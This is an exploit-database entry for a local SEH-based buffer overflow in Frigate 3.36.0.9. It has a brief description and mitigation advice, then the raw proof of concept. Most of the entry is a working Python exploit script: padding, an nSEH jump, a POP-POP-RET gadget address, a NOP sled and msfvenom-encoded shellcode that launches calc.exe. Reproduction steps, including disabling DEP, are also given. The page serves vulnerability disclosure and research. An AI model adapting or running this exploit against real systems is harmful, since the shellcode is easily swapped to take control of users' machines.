Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)

vendor:

Frigate

by:

Paras Bhatia

7.5

CVSS

HIGH

Local Buffer Overflow

119

CWE

Product Name: Frigate

Affected Version From:

Affected Version To: 3.36.0.9

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 Ultimate Service Pack 1 (32 bit - English)

2020

Frigate 3.36.0.9 – ‘Command Line’ Local Buffer Overflow (SEH) (PoC)

This exploit demonstrates a local buffer overflow vulnerability in Frigate version 3.36.0.9. By pasting a specially crafted input into the 'Command Line' field of the Frigate application, an attacker can execute arbitrary code and gain control of the system. This exploit triggers the execution of the calc.exe program as a proof of concept.

Mitigation:

The vendor should release a patch to address the buffer overflow vulnerability in Frigate. In the meantime, users can mitigate the risk by ensuring that the Frigate application is not accessible to untrusted sources and by implementing proper input validation and boundary checks.

Source

Exploit-DB raw data:

# Exploit Title: Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) 
# Vendor Homepage: http://www.frigate3.com/ 
# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-07
# Vulnerable Software: Frigate
# Version: <= 3.36.0.9
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  

#Steps to Produce the Crash:

#   1.- Run python code: FrigateLCE.py
#   2.- Copy content to clipboard
#   3.- Turn off DEP for Frigate3.exe
#   4.- Open "Frigate3.exe"
#   5.- Go to "Command" > "Command Line" > "Activate Command Line"
#   6.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application.
#   7.- Press Enter from Keyboard.
#   7.- Click on OK in the dialog box that appears.
#   8.- Calc.exe runs.


#################################################################################################################################################

#Python "FrigateLCE.py" Code:

f= open("FrigateLCE.txt", "w")

junk="A" * 4112

nseh="\xeb\x20\x90\x90"

seh="\x4B\x0C\x01\x40"

#40010C4B   5B               POP EBX
#40010C4C   5D               POP EBP
#40010C4D   C3               RETN
#POP EBX ,POP EBP, RETN | [rtl60.bpl]  (C:\Program Files\Frigate3\rtl60.bpl)

nops="\x90" * 50

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d"  -f python

buf =  ""
buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18"
buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f"
buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63"
buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5"
buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac"
buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee"
buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21"
buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc"
buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb"
buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33"
buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae"
buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f"
buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10"
buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6"
buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1"
buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05"




payload = junk + nseh + seh + nops + buf

f.write(payload)
f.close